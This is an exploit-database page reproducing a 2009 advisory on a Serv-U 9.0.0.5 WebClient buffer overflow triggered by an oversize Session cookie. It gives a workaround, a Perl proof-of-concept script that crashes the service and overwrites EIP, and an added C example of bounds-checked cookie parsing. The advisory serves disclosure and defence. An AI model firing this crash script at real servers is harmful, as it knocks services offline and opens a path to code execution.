0day.today - Biggest Exploit Database in the World.
Serv-u web client 9.0.0.5 buffer overflow
# Title: Serv-u web client 9.0.0.5 buffer overflow
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Nikolas Rangos
# Published: 2009-11-02
# Verified: yes

-- KC Security PUBLIC ADVISORY --
http://www.rangos.de -- 11-01-2009

RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow

Background
------------
Serv-U includes a simple, browser-based transfer client perfect for every business environment. The Web Client is accessed through a standard web browser and features an unintimidating, familiar interface. It is a great way for sharing photos and image files with clients and co-workers due to its configurable thumbnail view that allows remote images to be quickly viewed without downloading the entire file. An additional slideshow view offers a fast way to share a collection of photos from your latest projects. When using Serv-U, photo sharing sites and large email attachments are a thing of the past!

Description
------------
Remote exploitation of a buffer overflow in the Serv-U WebClient may allow attackers to execute arbitrary code. The problem lies in the handling of overly long Session Cookies. When a very long session cookie is sent to the Serv-U WebClient HTTP Service an overrun occurs and EIP becomes "overwritten".

Detection
------------
KC Security confirmed the vulnerability in the latest version of Serv-U WebClient which is 9.0.0.5.

Workaround
------------
Disable the WebClient Service and use the Serv-U FTP/SFTP components only.

Proof of concept
------------
The following PERL script will crash the Serv-U.exe service and overwrite EIP with 0xAAAAAAAA.
---snip---
use IO::Socket;

$|=1;   # unbuffered output

# Filler appended to the end of the Session cookie value
$a = "A" x 100000;

# Target host is taken from the first command-line argument
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => '80',
                                 Proto    => 'tcp');

print $sock "POST / HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
."Content-Length: 0\r\n\r\n";

# Print whatever the server sends back
while (<$sock>) {
    print;
}
---snip---
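
The Description above puts the fault in the handling of overly long Session cookies. The following is an added example, not code from the advisory or from Serv-U: a cookie extractor that measures the value before copying and rejects oversize input. The names cookie_get and SESSION_MAX, the 128-byte limit and the sample header are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limit for this sketch; the intact Session value in the PoC is 113 chars. */
#define SESSION_MAX 128

enum { COOKIE_OK = 0, COOKIE_MISSING = -1, COOKIE_TOO_LONG = -2 };

/* Copy cookie `name` from a Cookie header value (no CRLF) into out[outsz].
 * The value is measured before any copy; oversize input is rejected,
 * never truncated, so a caller cannot end up with a partial session id. */
int cookie_get(const char *hdr, const char *name, char *out, size_t outsz)
{
    size_t nlen = strlen(name);
    const char *p = hdr;

    if (outsz == 0)
        return COOKIE_TOO_LONG;
    out[0] = '\0';
    while (*p) {
        while (*p == ' ' || *p == ';')          /* skip pair separators */
            p++;
        const char *end = strchr(p, ';');       /* end of this name=value pair */
        if (!end)
            end = p + strlen(p);
        if ((size_t)(end - p) > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *val = p + nlen + 1;
            size_t vlen = (size_t)(end - val);
            if (vlen >= outsz)                  /* need room for the terminator */
                return COOKIE_TOO_LONG;
            memcpy(out, val, vlen);
            out[vlen] = '\0';
            return COOKIE_OK;
        }
        p = end;
    }
    return COOKIE_MISSING;
}

int main(void)
{
    /* Constructed header value, shaped like the cookie line in the PoC. */
    const char *hdr = "killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b";
    char sid[SESSION_MAX];
    int rc = cookie_get(hdr, "Session", sid, sizeof sid);
    printf("rc=%d session=%s\n", rc, sid);
    return rc == COOKIE_OK ? 0 : 1;
}
```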